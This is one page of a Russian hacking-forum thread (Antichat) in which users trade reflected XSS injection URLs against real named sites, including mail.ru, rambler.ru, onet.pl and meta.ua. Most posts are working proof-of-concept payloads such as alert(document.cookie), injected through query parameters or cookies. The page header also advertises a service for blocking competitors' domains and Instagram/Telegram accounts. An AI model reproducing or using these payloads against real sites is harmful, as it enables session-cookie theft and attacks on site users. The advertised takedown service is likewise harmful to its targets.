Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 17 из 25

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#161

22.11.2010, 22:38

Kusto

Moderator - Level 7

Регистрация: 04.02.2007

Сообщений: 554

С нами: 10139306

Репутация: 1089

Цитата:

Сообщение от ~d0s~

realty.
mail.ru

Код:

http://realty.mail.ru/detail/001667605.html

Добавляем в куки имя search_res а значение ставим ">alert(123)
Обновляем страничку,любуемся аллертом

Цитата:

Сообщение от satana666

В поле "Электронная почта"
">alert(document.cookie)

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//avito.ru.msn.com/additem[/COLOR][/COLOR]

ребят я конечно репу подниму, но скажу что такие уязвимости- бесполезны: цель ксс- атаки- выполнение произвольного кода на стороне клиента жертвы и как-бы просить его подправить куки, либо вписать в поле емайла наш ядовитый код- как-то не по феншую....

P.S. To satana666 - правильное исправление поста, второй ссылкой уже можно добиться результата

#162

23.11.2010, 21:00

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

cards.rambler.ru

Код:

http://cards.rambler.ru/author.html?author=d0s&offset=1">alert('true')

#163

30.11.2010, 17:49

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

Код HTML:

http://szukaj.onet.pl/query.html?qt=777&lr=Polska">alert(document.cookie)

#164

01.12.2010, 19:44

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

http://wap.ks.korrespondent.net/search.php?keyword=>alert('Speciall y for the Antichat')

Цитата:

Сообщение от None

ТИЦ 7200 PR 7
Посещаемость очень высокая.

#165

06.12.2010, 03:09

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

job.gala.net

Код:

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')

#166

09.12.2010, 17:51

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

meta.ua

Код:

http://meta.ua/feeds/weather.asp?city=alert(document.cookie)

Вчера там была и в поиске,не успел выложить,сегодня прихожу уже не работает,значит большая вероятность что и эту пофиксят скоро

#167

12.12.2010, 01:50

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

game.km.ru

Код:

http://game.km.ru/magazin/lenta.asp?idRubr=1&order=">alert('d0s')&search=xD

#168

13.12.2010, 15:35

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

wap.afisha.mail.ru

Код:

http://wap.afisha.mail.ru/event.html/">alert(document.cookie)

upd:Кто-то слил им

На днях еще на мейле выложу несколько.

#169

15.12.2010, 19:42

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

wap.rambler.ru

Код:

http://wap.rambler.ru/geo/?back=">alert(123)

#170

15.12.2010, 20:09

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

Цитата:

Сообщение от ~d0s~

wap.afisha.
mail.ru

Код:

http://wap.afisha.mail.ru/event.html/">alert(document.cookie)

upd:Кто-то слил им
На днях еще на мейле выложу несколько.

Все баги быстро закрывают из-за того, что сотрудника майла отслеживают такие темы.

Страница 17 из 25

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход